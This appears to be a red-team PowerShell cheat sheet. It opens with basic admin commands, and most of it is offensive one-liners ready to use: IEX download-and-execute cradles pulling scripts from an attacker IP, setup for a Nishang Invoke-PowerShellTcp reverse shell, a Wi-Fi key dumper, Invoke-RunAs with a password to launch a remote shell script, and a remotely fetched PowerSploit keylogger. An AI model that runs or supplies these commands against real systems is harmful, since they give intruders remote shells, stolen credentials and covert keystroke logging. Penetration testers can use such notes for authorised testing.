PowerShell

Basic commands

Help
1
Get-Help <command> -Detailed
Copied!
Display all properties
1
<command> | Select-Object -Property *
2
<command> | Select *
Copied!
Get file contents (like type or cat which is actually available as an alias, I guess)
1
Get-Content <file>
Copied!
Delete directory recursive
1
Remove-Item -Recurse -Force <dir>
Copied!
Write output to file
1
<command> | Out-File <file>
Copied!
Count
1
(<command>).Count
Copied!
Measures (Count, Avg, etc.)
1
<command> | Measure-Object
Copied!
Whoami
1
whoami /all
Copied!
-> SeImpersonatePrivilege (Potato exploits, PrintSpoofer, etc.)

Download file

1
IEX(New-Object Net.WebClient).downloadString('<url>')`
Copied!
or
1
IEX(IWR('<url>'))
Copied!

Check architecture

1
[environment]::Is64BitOperatingSystem
2
[environment]::Is64BitProcess
Copied!
64bit PowerShell path
1
C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell
Copied!

Base64 encode file

1
$fc = Get-Content "filename"
2
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
3
[System.Convert]::ToBase64String($fe)
Copied!

Nishang

Offensive PowerShell for red team, penetration testing and offensive security. GitHub - samratashok/nishang
Gather information
1
powershell -ExecutionPolicy bypass -file Get-Information.ps1 > results.txt
Copied!
Get wifi creds
1
.\Get-WLAN-Keys.ps1
Copied!
Reverse shell
1
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
Copied!
-> Append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to Invoke-PowerShellTcp.ps1 to automatically execute the shell
Remote execution
1
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Copied!
1
powershell -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Copied!

PowerShell-Suite

This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. GitHub - FuzzySecurity/PowerShell-Suite
1
Invoke-RunAs.ps1
Copied!
1
Invoke-RunAs -User Administrator -Password <pw> -LogonType 0x1 -Binary c:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe -Args "IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.ps1')"
Copied!
-> Put at the bottom of Invoke-RunAs.ps1, if not working otherwise

Keylogger

1
IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1)
2
Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1
Copied!